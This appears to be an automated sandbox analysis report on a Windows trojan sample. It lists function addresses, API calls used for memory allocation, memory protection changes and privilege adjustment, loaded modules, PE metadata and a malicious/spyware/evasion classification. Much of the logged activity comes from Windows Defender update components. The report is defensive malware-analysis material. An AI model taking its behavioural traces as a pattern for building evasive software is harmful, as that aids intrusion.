Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39E6480	19_2_00007FF7D39E6480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A32480	19_2_00007FF7D3A32480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A1E410	19_2_00007FF7D3A1E410
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39E0320	19_2_00007FF7D39E0320
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A3837C	19_2_00007FF7D3A3837C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2C21C	19_2_00007FF7D3A2C21C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39FA288	19_2_00007FF7D39FA288
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39DB20C	19_2_00007FF7D39DB20C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39F490C	19_2_00007FF7D39F490C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39DA818	19_2_00007FF7D39DA818
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2B88C	19_2_00007FF7D3A2B88C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A377FC	19_2_00007FF7D3A377FC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A1F76C	19_2_00007FF7D3A1F76C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39E15F8	19_2_00007FF7D39E15F8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A27600	19_2_00007FF7D3A27600
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39DC52C	19_2_00007FF7D39DC52C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A29520	19_2_00007FF7D3A29520
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2CCC8	19_2_00007FF7D3A2CCC8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39D1D00	19_2_00007FF7D39D1D00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39B9CFC	19_2_00007FF7D39B9CFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39E3CE0	19_2_00007FF7D39E3CE0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39D3C87	19_2_00007FF7D39D3C87
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2BC60	19_2_00007FF7D3A2BC60
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39E1C10	19_2_00007FF7D39E1C10
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A29B34	19_2_00007FF7D3A29B34
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39E0AB0	19_2_00007FF7D39E0AB0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2BA74	19_2_00007FF7D3A2BA74
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39DAA68	19_2_00007FF7D39DAA68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2D9D0	19_2_00007FF7D3A2D9D0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39BB944	19_2_00007FF7D39BB944
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A31950	19_2_00007FF7D3A31950
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39BB0C8	19_2_00007FF7D39BB0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A27108	19_2_00007FF7D3A27108
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A17050	19_2_00007FF7D3A17050
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2C034	19_2_00007FF7D3A2C034
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39E502C	19_2_00007FF7D39E502C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A3B058	19_2_00007FF7D3A3B058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2D058	19_2_00007FF7D3A2D058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39CEFCC	19_2_00007FF7D39CEFCC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39CDFB4	19_2_00007FF7D39CDFB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A35F9C	19_2_00007FF7D3A35F9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39DFFA8	19_2_00007FF7D39DFFA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A15ED0	19_2_00007FF7D3A15ED0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2BE48	19_2_00007FF7D3A2BE48
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A12DD4	19_2_00007FF7D3A12DD4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A2DD9C	19_2_00007FF7D3A2DD9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A31E00	19_2_00007FF7D3A31E00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A11D78	19_2_00007FF7D3A11D78

Source: MpAsDesc.dll.16.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Section loaded: sfc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Section loaded: phoneinfo.dll
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: edgegdi.dll

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe

File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdBoot.sys

Jump to behavior

Source: unknown

Driver loaded: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{EBBB10C2-099A-4A41-A364-F566D3127AB4}\MpKslDrv.sys

Source: WdFilter.sys.16.dr

Static PE information: Number of sections : 11 > 10

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe

File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpengine.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_0040352D

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: String function: 00007FF6F4480D88 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: String function: 00007FF6F4480DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: String function: 00007FF6F44DBAAC appears 36 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: String function: 00007FF7D3A1BAAC appears 36 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: String function: 00007FF7D39C0D88 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: String function: 00007FF7D39C0DB4 appears 56 times

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A266BD NtProtectVirtualMemory,	1_2_02A266BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A24745 LoadLibraryA,NtAllocateVirtualMemory,	1_2_02A24745
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F448C444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle,	7_2_00007FF6F448C444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4495DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError,	7_2_00007FF6F4495DB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4489FF0 NtSetInformationFile,	7_2_00007FF6F4489FF0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4495B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile,	7_2_00007FF6F4495B80
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39CC444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle,	19_2_00007FF7D39CC444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39D5B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile,	19_2_00007FF7D39D5B80
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39C9FF0 NtSetInformationFile,	19_2_00007FF7D39C9FF0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39D5DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError,	19_2_00007FF7D39D5DB4

Source: mpengine.dll.3.dr	Static PE information: Resource name: PACKEDBINARY type: PE32+ executable (native) x86-64, for MS Windows
Source: mpengine.dll.3.dr	Static PE information: Resource name: PACKEDBINARY type: PE32+ executable (native) x86-64, for MS Windows
Source: mpengine.dll.3.dr	Static PE information: Resource name: PACKEDBINARY type: PE32+ executable (native) x86-64, for MS Windows
Source: mpengine.dll.3.dr	Static PE information: Resource name: PACKEDBINARY type: PE32+ executable (GUI) x86-64, for MS Windows
Source: mpengine.dll.3.dr	Static PE information: Resource name: PACKEDBINARY type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Source: mpengine.dll.3.dr	Static PE information: Resource name: PACKEDBINARY type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: mpengine.dll.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ProtectionManagement.dll.mui.16.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: ProtectionManagement.dll.mui0.16.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: MpAsDesc.dll.mui3.16.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ProtectionManagement.dll.mui1.16.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: ProtectionManagement.dll.mui2.16.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: ProtectionManagement.dll.mui4.16.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: WdFilter.sys.16.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ProtectionManagement.dll.mui6.16.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS

Source: MpEvMsg.dll.mui5.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui2.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui28.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui41.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui44.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui31.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui51.16.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui2.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui22.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui37.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.16.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui5.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui10.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui30.16.dr	Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.3.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui25.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui36.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui23.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui46.16.dr	Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.3.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui13.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.16.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui4.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui29.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui24.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui47.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui9.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui52.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.16.dr	Static PE information: No import functions for PE file found
Source: mpasbase.vdm.3.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui40.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui9.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.16.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.16.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui6.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui21.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui19.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui10.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui29.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui3.16.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui1.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui22.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui53.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui12.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui17.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui42.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui33.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui1.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui28.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui48.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui10.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui45.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui50.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui7.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.16.dr	Static PE information: No import functions for PE file found
Source: mpavbase.vdm.3.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui39.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui16.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui26.16.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui0.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui49.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui7.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui20.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui6.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui32.16.dr	Static PE information: No import functions for PE file found
Source: HPSUPD-Win32Exe.exe.1.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui27.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui20.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui43.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui38.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.16.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.16.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui11.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.16.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.16.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.16.dr	Static PE information: No import functions for PE file found

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamevm3ddevapi64-release.dll> vs SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Source: C:\Windows\System32\wevtutil.exe

Process token adjusted: Security

Jump to behavior

Source: mpavdlta.vdm.3.dr

Static PE information: Section: .rsrc ZLIB complexity 0.999874238483

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/253@0/7

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F447B0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,

7_2_00007FF6F447B0C8

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Code function: 7_2_00007FF6F4491AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError,

7_2_00007FF6F4491AE0

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Virustotal: Detection: 30%
